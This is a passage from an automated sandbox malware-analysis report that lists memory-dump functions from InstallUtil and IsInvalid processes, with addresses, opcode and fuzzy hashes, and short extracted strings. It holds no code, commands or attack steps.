                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f49e63d4dbd196dddf82f7022204d14ef355352610c58e08ba5026742b9de0b
                                                                      • Instruction ID: 032f1c6a4699b9d2507a8ce8d02ac0ea2571793ff3bb797bd8448d2bdd089490
                                                                      • Opcode Fuzzy Hash: 0f49e63d4dbd196dddf82f7022204d14ef355352610c58e08ba5026742b9de0b
                                                                      • Instruction Fuzzy Hash: 1F21CF70E002098BDB08DFAAE80A6EEFBF6FFC9300F04D465D514BB2A4DB7085058B64
                                                                      Function 0157D12E Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4622c80a408f63390aca96eeb555120ce629eb4afa17212f981f57d04f2ebb52
                                                                      • Instruction ID: 92da1ba4447edf78ab84b0bd63ddbb52950dce5de50cccc603376a47ce3442ec
                                                                      • Opcode Fuzzy Hash: 4622c80a408f63390aca96eeb555120ce629eb4afa17212f981f57d04f2ebb52
                                                                      • Instruction Fuzzy Hash: 47213731D112099ECB11EFE8E9456ECFBB4FF4A304F009625E5447B254EB31A64ACB51
                                                                      Function 01572060 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abdd7234e653d9f1f0f13f68b1df7f35216f60e949aeda6897f04ca8f7980cd2
                                                                      • Instruction ID: fd5291b11e19467e40deb5a3a04d4b4779863f9738c904f71e6fb384807395e0
                                                                      • Opcode Fuzzy Hash: abdd7234e653d9f1f0f13f68b1df7f35216f60e949aeda6897f04ca8f7980cd2
                                                                      • Instruction Fuzzy Hash: E021F475A00105AFCB15DF38D4509AE37A6FB89254F10C45DD84E8B380DB35EA42CBE2
                                                                      Function 0114D4F0 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4147797091.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_114d000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6bc861f0c378bd5b593d0c3156b3facd51b7ad4f04fa75ddda9e17af536a494
                                                                      • Instruction ID: c1f6f59c95cdeb3ed4f7f871b7bf5ecc668f13ede9f549f50a8ed656c3ff6fcf
                                                                      • Opcode Fuzzy Hash: d6bc861f0c378bd5b593d0c3156b3facd51b7ad4f04fa75ddda9e17af536a494
                                                                      • Instruction Fuzzy Hash: CF210671504200DFDF09DF58E9C0B26BF75FBA8B18F208569E9054E256C736D455CAE2
                                                                      Function 01575A78 Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48486703d3677ebf1f6dfd499fb43ff6e089c77ed83d0d105d0ea29a6055bc8c
                                                                      • Instruction ID: febc6d2aef0ced2cfe444e2aa009fc8a05f44bc58dbac32b64358f49a4784d98
                                                                      • Opcode Fuzzy Hash: 48486703d3677ebf1f6dfd499fb43ff6e089c77ed83d0d105d0ea29a6055bc8c
                                                                      • Instruction Fuzzy Hash: 9221F3347607228BC719AA29E49593EB792BF88611B094579E90ACF344EF70DC02CBC0
                                                                      Function 0139D044 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4148989654.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_139d000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17df448e13ca474cfb427dd5bb2dd2a3f0fcdab4ba13ffad9af1ba0965d1d40b
                                                                      • Instruction ID: 36946a6e0188f67f5701e6e3f1ee1136d42db0310fd05ba6427f23909fa70da4
                                                                      • Opcode Fuzzy Hash: 17df448e13ca474cfb427dd5bb2dd2a3f0fcdab4ba13ffad9af1ba0965d1d40b
                                                                      • Instruction Fuzzy Hash: 182122B1504204DFCF11DF68C9C5B26BBA5FB84318F20C56DE8494B352C73AD846CA61
                                                                      Function 01574DC1 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 794e214daf1baf86466446028f204b0780c15c79896d40bc27cf6aac5456dba5
                                                                      • Instruction ID: c3272a0126c2783d0bfd1c09ddb8f77ff346d9268e7f5c5df44a015b87df87e5
                                                                      • Opcode Fuzzy Hash: 794e214daf1baf86466446028f204b0780c15c79896d40bc27cf6aac5456dba5
                                                                      • Instruction Fuzzy Hash: E121C3316642299FCB19AF28E4057AF3BA2FB84614F104428FD158F344CB34DC65CBE1
                                                                      Function 0157D61F Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40fb0b147bdb00aa7262231002cbe1f7c55cc4b71cbb263cd0b78d3c36aa1949
                                                                      • Instruction ID: dfab76b64dd4c6e6cee0e1dfb40c2971f8e78aababca5465083a3b8ac9080c73
                                                                      • Opcode Fuzzy Hash: 40fb0b147bdb00aa7262231002cbe1f7c55cc4b71cbb263cd0b78d3c36aa1949
                                                                      • Instruction Fuzzy Hash: 65115B71D006088BDB08DFAAE8096EEFBB2FFC9311F18D52AD418BB255DB3095458F64
                                                                      Function 01571EF8 Relevance: .1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0b537ed7f7716de17ba0f691363c6b8f2972e4b46712be42494f798296fc023
                                                                      • Instruction ID: 6d86341454585ea5555503d66238a4d2c58532bc566c34c7168fdef879c0a109
                                                                      • Opcode Fuzzy Hash: a0b537ed7f7716de17ba0f691363c6b8f2972e4b46712be42494f798296fc023
                                                                      • Instruction Fuzzy Hash: 782123B4C057198FCB41EFA8D8955EDBFF4BF0A300F1051AAD845B7260EB305A85CBA1
                                                                      Function 0157E211 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc92d9af51723d76cf834d6908b850724f70a82ccc1db937a6f8f347769cbccb
                                                                      • Instruction ID: 5e6e0436b0e74a2548b1e1b61481209c26f480d7457381b8c9b126f508c7b31c
                                                                      • Opcode Fuzzy Hash: dc92d9af51723d76cf834d6908b850724f70a82ccc1db937a6f8f347769cbccb
                                                                      • Instruction Fuzzy Hash: 57213D74D0020D9FDB54EFB8E991A9EBBF2FB44304F00D5A6D0149B318EB305A45DB81
                                                                      Function 01571F61 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f745e646a6667cbcd0c7f7f04999dca439135c0a2dea643533df76afa501daa5
                                                                      • Instruction ID: e95210016fee16a8fb832c36834ab0898329a2866003b18988d7a4550c5ee68e
                                                                      • Opcode Fuzzy Hash: f745e646a6667cbcd0c7f7f04999dca439135c0a2dea643533df76afa501daa5
                                                                      • Instruction Fuzzy Hash: 9021E2B4D5160E8FCB44EFA9D8956EEBFF5FB08300F10566AD805B2210EB345A95CBA1
                                                                      Function 0114D4EB Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4147797091.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_114d000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction ID: 263a9121d394b2214b8158f5c5ea1dbee42e11c469a787e2e36b6b4cd05a3b59
                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction Fuzzy Hash: 62119D76504240CFDF16CF54E5C4B16BF71FB94714F24C6A9D9090A256C336D45ACBA2
                                                                      Function 0157E218 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f2dada80d856ceaf7a35c8e5483d71596b93f0daf93494572dc99bbebafaba
                                                                      • Instruction ID: 9775442dcf6de3d0b2137d2a2cdfbe1f8b30340388099aef6d82771a0a19351a
                                                                      • Opcode Fuzzy Hash: 73f2dada80d856ceaf7a35c8e5483d71596b93f0daf93494572dc99bbebafaba
                                                                      • Instruction Fuzzy Hash: 8F114C70D0020D9FDB54EFB8D991A9EBFF2FB44304F00D5AAD0149B318EB305A459B81
                                                                      Function 0157560F Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3033b224fc8e75e24b52c6990044a2a769749167019dc72c3efa0614d33db034
                                                                      • Instruction ID: 98f90ca492cd27df3cf5bd3e4ebbbbf4a2ba8208b43e69833ac3d9e96141b94b
                                                                      • Opcode Fuzzy Hash: 3033b224fc8e75e24b52c6990044a2a769749167019dc72c3efa0614d33db034
                                                                      • Instruction Fuzzy Hash: 7801F972B102256FDB069E65A811AEF3FA7EFC9650B14813AFA14CB340DA758D11CBA0
                                                                      Function 0139D03F Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4148989654.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_139d000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                      • Instruction ID: 68da4b8eb9cfb2b508d53c4ea963010bb6bbc6665bf8c65f33a8d0ab047c0b2c
                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                      • Instruction Fuzzy Hash: 5411DD76504284CFDB12CF58C9C4B16BFA2FB84318F24C6AAD8494B352C33AD44ACF62
                                                                      Function 0157D459 Relevance: .0, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8196bf4155909b785be5cf79f260bde9ed7d45de0f31870a21ffa557b7430e19
                                                                      • Instruction ID: 63c22af0f85009be7e383cfee6f71852d3fc56146a2140ad652bc3c56694c391
                                                                      • Opcode Fuzzy Hash: 8196bf4155909b785be5cf79f260bde9ed7d45de0f31870a21ffa557b7430e19
                                                                      • Instruction Fuzzy Hash: 0DE06831E0010C97CB019A99FC0E3FEB7B9EB86301F006136D504FB290CBB2A2098AA1
                                                                      Function 0157DF18 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d14101632c848d2e2af8215b8d838863d62adc5b5c92c2fc78288ae56625856
                                                                      • Instruction ID: 2481b5d2fd328ae78232ea084a0f66df5aa506d3d5fa32799cb3eb81df5ea140
                                                                      • Opcode Fuzzy Hash: 9d14101632c848d2e2af8215b8d838863d62adc5b5c92c2fc78288ae56625856
                                                                      • Instruction Fuzzy Hash: E2E02230904208DFDB008EA9E85A3FAB7B9FBCA314F8094B5D614A21A0DBB152098A90
                                                                      Function 0157D4C4 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86bbb86b88971d076048bee89a3accdfb3e037a2df1edf4f6a638d21a375e7a0
                                                                      • Instruction ID: 5ec1b551dee25e2e45587ba1b6b2d6f4fceb6e4e56a43df70eed1e433824d471
                                                                      • Opcode Fuzzy Hash: 86bbb86b88971d076048bee89a3accdfb3e037a2df1edf4f6a638d21a375e7a0
                                                                      • Instruction Fuzzy Hash: D5E026A3C08140CBD3018BEAB8130F9BF71EDE3241B44A4C7D049CF125E699E206DB12
                                                                      Function 01572010 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 078fcf8d3dbd721ad4a42cfbdea95ebcf7f3215fffb63e5a7a2234b51ffabd59
                                                                      • Instruction ID: b5f64eb98d66d1f508e4a396995917259378c12a2d52c819b9d027b270deeb62
                                                                      • Opcode Fuzzy Hash: 078fcf8d3dbd721ad4a42cfbdea95ebcf7f3215fffb63e5a7a2234b51ffabd59
                                                                      • Instruction Fuzzy Hash: 61E02632D2022A53CB009BB0DC016DFB338EF91220F804321DC2432100EB74728B86E2
                                                                      Function 01572020 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29357eb53205117b43a4f4f5b5f542642d21a54519a9db2620536a296d327da4
                                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                      • Opcode Fuzzy Hash: 29357eb53205117b43a4f4f5b5f542642d21a54519a9db2620536a296d327da4
                                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                      Function 01578270 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                      • Instruction ID: 71d316762a2e281ed3eb770fbeb255fe8c4617fa69d9d96aa303640c96d1f6aa
                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                      • Instruction Fuzzy Hash: C8C08C3320C5282EA625108F7C4AFABBB8CF3C16B5B350237F51CCB2009843AC8001F4
                                                                      Function 0157A71D Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbee5ce18e9ffff1c21c82fe77afa70204518418c076b573852ec6e46fd75219
                                                                      • Instruction ID: 398b00e8caa84d5bc2b35a43e2add46205fc536a5f869aba78704744fbdc3a05
                                                                      • Opcode Fuzzy Hash: dbee5ce18e9ffff1c21c82fe77afa70204518418c076b573852ec6e46fd75219
                                                                      • Instruction Fuzzy Hash: 17D0173BB40018DFCB048F89E8408DDB7B6FB9C221B008126EA11A3220C6319821CB60
                                                                      Function 01575EB0 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1f5e323b5e7d94e12a9bc097df980972595840af6c3efd2b52696d64835ea95
                                                                      • Instruction ID: 60b5c715897802b1d0df3e5bfd533f7249593d46f58c2412a14f9718e070cd20
                                                                      • Opcode Fuzzy Hash: f1f5e323b5e7d94e12a9bc097df980972595840af6c3efd2b52696d64835ea95
                                                                      • Instruction Fuzzy Hash: B1D02B3055C34A4FC306F330EA614553B29A68020CBC045F0E8040552BEB64488C8B71
                                                                      Function 0157FBFB Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9140053ddaacac374eea15c5a2880c9a8750a1d5c812634a61c55fb614be8142
                                                                      • Instruction ID: b7b500d67922e22ed7b869fa0265cf2a1a9b9acb55274d157775cce82770b379
                                                                      • Opcode Fuzzy Hash: 9140053ddaacac374eea15c5a2880c9a8750a1d5c812634a61c55fb614be8142
                                                                      • Instruction Fuzzy Hash: CFD06774D4412DCBCB20DF94EA456ECB7B0EF95300F0028E79809B6210D7305A908F11
                                                                      Function 01575EC0 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c820d313074250f20acb4909a4ec911ec06977bce63ec73d711675ece9e8d73d
                                                                      • Instruction ID: 10aa3e339d2894eb44668039c9f8ae9db5fc074f258a7899bb58b3765e995634
                                                                      • Opcode Fuzzy Hash: c820d313074250f20acb4909a4ec911ec06977bce63ec73d711675ece9e8d73d
                                                                      • Instruction Fuzzy Hash: 46C012305A830E4FC609F775EA55565772AB7C0604F404670A5190622DDF74588C8AA0

                                                                      Non-executed Functions

                                                                      Function 0157E538 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .5vq
                                                                      • API String ID: 0-493797296
                                                                      • Opcode ID: ae06c693f67b411208cba41661d70324f5c6ad3677581a92d238f78ba53e9405
                                                                      • Instruction ID: 8769a05e02f9bab87e5f02e8819914307f30c98bfeb9f5f8508019fdd2870cc0
                                                                      • Opcode Fuzzy Hash: ae06c693f67b411208cba41661d70324f5c6ad3677581a92d238f78ba53e9405
                                                                      • Instruction Fuzzy Hash: 8552BD74E01229CFDB64DF69D985B9DBBB2BB89300F1085EAD409AB354DB319E81CF50
                                                                      Function 01572150 Relevance: 5.2, Strings: 4, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                                      • API String ID: 0-2732225958
                                                                      • Opcode ID: 9dc786e8f0b011ddf101f85d825353a019635962d2b10f25dd6ac984fff3f71c
                                                                      • Instruction ID: 1aab7acdf94ffa148cc9608a9dd046c0b9f29f4a94f123e91ad8771be507dcbc
                                                                      • Opcode Fuzzy Hash: 9dc786e8f0b011ddf101f85d825353a019635962d2b10f25dd6ac984fff3f71c
                                                                      • Instruction Fuzzy Hash: A571F430E042298FCF55DFB8D8517AEBBB6BF89300F10856AD515AB351DB308985CB91
                                                                      Function 015760A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \;^q$\;^q$\;^q$\;^q
                                                                      • API String ID: 0-3001612457
                                                                      • Opcode ID: 7e5bcb75f9a2a7f059dcbdb4ffc2b01ab15dbf6de0915986fb7ebbfb9666acc6
                                                                      • Instruction ID: 6fd28ba51dd26aac0c9322b5cd4c6d4ebb58ee80e7aebb6bcaf5022c55e60696
                                                                      • Opcode Fuzzy Hash: 7e5bcb75f9a2a7f059dcbdb4ffc2b01ab15dbf6de0915986fb7ebbfb9666acc6
                                                                      • Instruction Fuzzy Hash: 8B01D431750914CFEB199E2CE55A92A77FBBF88B60315496AE402CF3B1DE32DC418780

                                                                      Executed Functions

                                                                      Function 0140D388 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TJcq$Te^q$pbq$xbaq
                                                                      • API String ID: 0-1954897716
                                                                      • Opcode ID: 2d7e42bfddc09718531f9dc4eb8b83091c08c285a493c60bf3a5cb6bfaa6ad09
                                                                      • Instruction ID: 0d8e0cbf88c767bf1680ec3c929e0947238f54b9acbe90916af707239a9e6b3e
                                                                      • Opcode Fuzzy Hash: 2d7e42bfddc09718531f9dc4eb8b83091c08c285a493c60bf3a5cb6bfaa6ad09
                                                                      • Instruction Fuzzy Hash: 7AA2D574E00228CFDB65CF69C980A99BBB2FF89304F1581E9D509AB365DB319E85CF40
                                                                      Function 074BF160 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Deq
                                                                      • API String ID: 0-948982800
                                                                      • Opcode ID: 546f8b9b5668dd42a19eb827e2e9921fc45b5b5b7192a9d45c256f06017a1eee
                                                                      • Instruction ID: 4e02dcc86a7b6d23505e203085b448c3e91fc2b137baca074987115cbe7376ec
                                                                      • Opcode Fuzzy Hash: 546f8b9b5668dd42a19eb827e2e9921fc45b5b5b7192a9d45c256f06017a1eee
                                                                      • Instruction Fuzzy Hash: 2FD1C374E00219CFDB64DFA9D994A9DBBB2FF89304F1080A9D409AB365DB30AD85CF51
                                                                      Function 0140F498 Relevance: 6.6, Strings: 5, Instructions: 345COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq$(bq$(bq$(bq$(bq
                                                                      • API String ID: 0-2298650571
                                                                      • Opcode ID: 76c40260d9d801d1bb198eb9f84472920b4ad91533a3fcc72aefeb052359ae96
                                                                      • Instruction ID: 696e432a6509885cba7d4105cc4cfb2895bacb4c4bcdc812dcb40e7f57b3bfb8
                                                                      • Opcode Fuzzy Hash: 76c40260d9d801d1bb198eb9f84472920b4ad91533a3fcc72aefeb052359ae96
                                                                      • Instruction Fuzzy Hash: 70B1F1327042158FDB15DF6AD854AAE7BEAEFC4311B18807AE906CB7A1CF35DC068790
                                                                      Function 05DD1C28 Relevance: 4.6, Strings: 3, Instructions: 809COMMON
